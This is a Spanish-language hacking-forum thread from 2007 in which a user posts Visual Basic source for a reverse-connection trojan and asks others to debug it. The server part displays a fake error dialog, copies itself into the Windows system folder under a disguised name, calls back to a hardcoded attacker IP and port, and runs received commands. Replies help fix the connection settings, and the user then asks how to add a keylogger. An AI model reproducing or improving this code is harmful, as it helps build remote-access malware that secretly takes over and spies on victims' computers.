elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Buscar Ingresar Registrarse
24 Mayo 2012, 06:17  

Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  no me sirve
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: no me sirve  (Leído 1,157 veces)
Sai-To

Desconectado Desconectado

Ver Perfil
no me sirve
« en: 31 Octubre 2007, 01:02 »

Hola bueno disculpen las molestias pero tenia una pregunta, cuando yo hago un troyano de coenxion inversa y lo ejecuto se ejecuta bien todo el SErver y el Cliente pero el Server no se me conecta a que se debe esto??, aki les dejo el code para ver si les sirve de algo?

CLIENTE

CODE:

Private Sub Command1_Click()
On Error Resume Next                                      'esta linea sirve para que en caso de error siga el programa en la siguiente linea sin interrumpirlo
ws.LocalPort = Text1.Text                              'el puerto que empleara el winsock sera el que introduzcas en un textbox
ws.Close                                                            'ws llama al objeto winsock que hemos agregado el punto te deja elegir opciones, y la opcion close es para que cierre la conexiono el puerto abierto
ws.Listen                                                           'deja ala escucha el puerto introducido en el textbox
If ws.State = 2 Then Label1.Caption = "Estado:Conectando"            'si el estado del winsock es (Conectando) entonces la propiedad caption de la etiketa sera
End Sub

Private Sub Command2_Click()
ws.SendData Text2.Text
End Sub

Private Sub Timer1_Timer() 'al pasar 3 segundos de establecerse la conexion
On Error GoTo error
If Not ws.State = 7 Then                       'si el estado de la conexion no es (conectado) entonces que me ponga en una etekita "Desconectado"
Label1.Caption = "Estad:Desconectado"
Else
End If
If ws.State = 7 Then
Label1.Caption = "Estado:Conectado"
Else
End If
If Label1.Caption = "Estado:Desconectado" Then     'si pone desconectado en el label, entonces ejecuta lo de la etiketa puente,"cerrar y volver a escuchar"
Label1.Caption = "Estado:Desconectado"
GoTo puente
Else
End If
GoTo error                                               'puentea y se salta el cierre y vuelta a escuchar la conexion, para que seguir normalmente con la conexion establecida
puente:
ws.Close
ws.Listen
error:
End Sub

Private Sub ws_ConnectionRequest(ByVal requestID As Long)         'cuando se intente conectar a este (servicio,puerto,socket,o etc..) recojera su ip y ejecutara el siguiente codigo:
On Error GoTo error                                                                                'si ay un error ves ala etiketa (error)
ws.Close                                                                                                  'necesario para aceptar la conexion
ws.Accept requestID                                                                            'acepta cualquier conexion entrante
Label2.Caption = ws.RemoteHostIP                                                                                                                                     'esto ejecuta un archivo, yo lo puse para que ejecutase un sonido y asi coscarme de cuando se me conecta la victima, osea el servidor
Timer1.Interval = 300                                                                            '3 segunditosss, sobra decir que tienes que añadirlo asi que ahora sere mas concreto por que ya presupongo que as aprendido algo de vb de la revista, o con solo averlo visto por encima y jugueteado un poco con el , entenderas todo lo que digo, y sino ya pregunhtareis
error:
End Sub

SERVER:

Private Sub cmdok_Click()
On Error GoTo error
If Not ws.State = 7 Then GoTo puente         'si no ay conexion cierra, CONECTA ala ip puesta en la variable ipy po rel puerto puesto en la variable port
GoTo error
puente:
ws.Close
ws.Connect
error:
End Sub

Private Sub Form_Load()
MsgBox "Un error ha ocurrido en la aplicacion"
Dim win
Dim sys
Dim residencia
On Error Resume Next
ip = "xxxxxxxxx"                             'esta es nuestra ip local, asi que conectara a nuestra ip local, aqui se pondria nuestra ip publica, y si cambia pues os registrais en no-ip.com y si habeis leido la revista no tendreis problemas
ipftp = "xxxxxxxx"
port = 8721
ws.RemoteHost = ip
ws.RemotePort = port
Timer1.Interval = 60000     'se esteblace un intervalo de 3 segundos para ejecutar el evento timer1
ejec = App.Path                                    'le pasamos a la variable la ruta del exe que ejecute la victima
If Right(ejec, 1) <> "\" Then ejec = ejec & "\"    'si no tiene la "\" al final, se la añadiremos
ejec = ejec & App.EXEName & ".exe"                 'añadimos ala ruta del exe, el nombre y la estension
Set obj = CreateObject("Scripting.FileSystemObject") 'declaramos un objeto tipo fileSystem object
Set win = obj.GetSpecialFolder(0)                    'para obtener la carpeta de windows y system
Set sys = obj.GetSpecialFolder(1)
win = LCase(win)                                     'las ponemos en minusculas
sys = LCase(sys)
FileCopy ejec, sys & "\nombre1"                     'copia a windows\system32
Name sys & "\nombre1" As sys & "\nombre2.exe"       'renombra
End Sub

Private Sub Timer1_Timer() 'cuando pasan 60 segundos
On Error GoTo error
If Not ws.State = 7 Then Call cmdok_Click                                          'llama al evento click del boton cmdok si no ay conexion establecida
If ws.State = 7 Then Label2.Caption = "Estado:conectado" Else Label2.Caption = "Estado:desconectado"       ' ya esplicado
error:
End Sub

Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
On Error GoTo error
Dim datos As String
ws.GetData datos          'metemos en la variable datos los datos que nos lleguen
Text1.Text = datos
If datos = "paint" Then Shell ("mspaint")
error:
End Sub

Saludos y disculpen las molestias que ocasionoo!!
ska1ix

Ver Perfil
Re: no me sirve
« Respuesta #1 en: 31 Octubre 2007, 15:59 »

Las únicas dos cosas que se me ocurren:

¿El puerto que le pones en el text al cliente es igual que el que tienes definido en el server (8721 por lo que leo en el código)?

¿La IP que le pones en el server está bien? ¿Lo estás probando en ordenadores remotos o en un mismo ordenador mediante la IP 127.0.0.1?

No sé, danos más datos, se supone que el código está bien, veo que lo has cogido de un tutorial (así se aprende).
Sai-To

Ver Perfil
« Respuesta #2 en: 31 Octubre 2007, 18:56 »

Bueno gracias y voy a intentar resolver el asunto pero aqui te dejo las respuesta y otras cosas mira:

1 Pregunta: -Yo estoy usando mi IP imaginemos que es 121.121.0.121 (Por decirlo asi) y me voy a conectar al puerto 8721, bueno como dijsites tu, lo meto en el Text pongo 8721 y le doy al boton conectar, ahora si se conectara el server a mi eso me avisaria, osea el cliente.

Y yo creo que el que falla es el server ya que si le hago telnet a la ip y puerto que me quiero conectar, el cliente me que esta conectado y me dice quien se conecta a mi!

2 Pregunta: - Bueno la ip que le pongo en el server es mi ip osea en:

Ip:(pongo mi IP) este caso, 121.121.0.121
y en el Ipftp:(Pongo mi Ip igual que en elprimero!) 121.121.0.121

Y bueno el probe los dos en mi maquina pero el server no se conecta y como dije antes le hize telnet a el cliente y si me conecta y tambien use otra compu pero no me coencta, y cuando le hago ip al cliente desde la otra pc Si me conecta!
Y no lo estoy probando con la IP 127.0.0.1 lo estoy probando con el mio!

Saluds y vere que peudo hacer y si alguien sabe que pasa postee Gracias! :D
ogcu

Ver Perfil
« Respuesta #3 en: 31 Octubre 2007, 21:29 »

Bueno gracias y voy a intentar resolver el asunto pero aqui te dejo las respuesta y otras cosas mira:

1 Pregunta: -Yo estoy usando mi IP imaginemos que es 121.121.0.121 (Por decirlo asi) y me voy a conectar al puerto 8721, bueno como dijsites tu, lo meto en el Text pongo 8721 y le doy al boton conectar, ahora si se conectara el server a mi eso me avisaria, osea el cliente.

Y yo creo que el que falla es el server ya que si le hago telnet a la ip y puerto que me quiero conectar, el cliente me que esta conectado y me dice quien se conecta a mi!

2 Pregunta: - Bueno la ip que le pongo en el server es mi ip osea en:

Ip:(pongo mi IP) este caso, 121.121.0.121
y en el Ipftp:(Pongo mi Ip igual que en elprimero!) 121.121.0.121

Y bueno el probe los dos en mi maquina pero el server no se conecta y como dije antes le hize telnet a el cliente y si me conecta y tambien use otra compu pero no me coencta, y cuando le hago ip al cliente desde la otra pc Si me conecta!
Y no lo estoy probando con la IP 127.0.0.1 lo estoy probando con el mio!

Saluds y vere que peudo hacer y si alguien sabe que pasa postee Gracias! :D

No, no estas haciendo mal. Esa es tu ip para la red que tienes montada, pero para tu propio equipo se conecte a tu propio equipo deberias poner

127.0.0.1 <--- Eso quiere decir que te conectas a vos mismo.
Sai-To

Ver Perfil
« Respuesta #4 en: 2 Noviembre 2007, 00:54 »

Saludos y muchas gracias por sus respuestas!....

ahora tengo la ULTIMA dudita! ;D jaja de verdad disculpen que postee y postee y sea Tan fastidioso :-X pero bueno luego se los recompenso! :D

jeje bueno mi pregunta es esta Yo estoy haciendo un troyano y yo quiero que mi troyano tenga keylogger.
Ahora como hago para ponerle Keylogger a mi Troyano?, le tengo que poner un codigo ò hay un programa que se los adjunta?

Saludos y de verdad Disculpen Todas las molestias que estoy causando!!! :(

Sal2!!
BenRu
The Prodigy

Ver Perfil
« Respuesta #5 en: 2 Noviembre 2007, 01:48 »

Saludos y muchas gracias por sus respuestas!....

ahora tengo la ULTIMA dudita! ;D jaja de verdad disculpen que postee y postee y sea Tan fastidioso :-X pero bueno luego se los recompenso! :D

jeje bueno mi pregunta es esta Yo estoy haciendo un troyano y yo quiero que mi troyano tenga keylogger.
Ahora como hago para ponerle Keylogger a mi Troyano?, le tengo que poner un codigo ò hay un programa que se los adjunta?

Saludos y de verdad Disculpen Todas las molestias que estoy causando!!! :(

Sal2!!

Pues aprendiendo a programar y si no, bajandote un troyano ya creado y no limitarte a plagiar códigos.

Un saludo
skapunky
Electronik Engineer &
CoAdmin

Ver Perfil WWW
« Respuesta #6 en: 2 Noviembre 2007, 01:59 »

Bueno,Benru te lo ha dicho pero yo te amplio, lo unico que consigues compiando un codigo es que al compilarlo lo detecte hasta el paint el troyano XDDDDDDDDDDDd.

Intenta aprender un lenguaje de programación como es delphi o de segundas te recomiendo visual basic y programa un troyano. Te recomiendo que no hagas como muxa gente que pide un tutorial de como programar un troyano y fardea de eso y ni tan solo sabe declarar una puñetera variable...Empieza des del principio, el tiempo que inviertas a la larga los ganas de forma exponencial.

Saludos.

Sai-To

Ver Perfil
« Respuesta #7 en: 2 Noviembre 2007, 02:23 »

Bueno gracias y skapunky seguire tu consejo mejor me pongo a estudiar desde el comienzo!  :)

Salu2!
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
q ram me sirve???
Hardware
NickyRock1979 2 692 Último mensaje 1 Diciembre 2010, 01:05
por NickyRock1979
De que sirve spoofear una IP?
Hacking Básico
puntoinfinito 2 429 Último mensaje 25 Marzo 2012, 22:25